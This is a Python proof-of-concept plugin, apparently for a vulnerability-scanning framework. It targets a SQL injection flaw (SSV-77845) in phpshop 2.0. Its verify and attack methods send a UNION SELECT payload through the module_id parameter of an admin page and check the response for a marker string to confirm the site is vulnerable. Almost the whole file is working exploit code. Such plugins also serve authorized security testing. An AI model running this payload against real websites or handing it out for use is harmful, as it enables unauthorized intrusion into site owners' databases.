#!/usr/bin/env python
# coding: utf-8

from peppa_pc import requests as req
from peppa_pc import POCBase, OutPut
import re


class TestPOC(POCBase):
    pid = 'SSV-77845'  # vul ID
    version = '1'
    name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
    author = 'tudou'
    create_date = '2015-10-16'
    update_date = '2015-10-16'
    app_name = 'phpshop'
    app_version = '2.0'
    vul_type = 'SQL Injection'
    info = '''
           ?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
    '''
    # the sample sites for examine
    samples = ['']

    def verify(self):
        result = {}
        target_url = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"
        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
        content = response.content
        match = re.search('qbxvqPfNhXNLXCRqjqqq', content)
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url
        return self.parse_attack(result)

    def attack(self):
        return self.verify()

    def parse_attack(self, result):
        output = OutPut(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output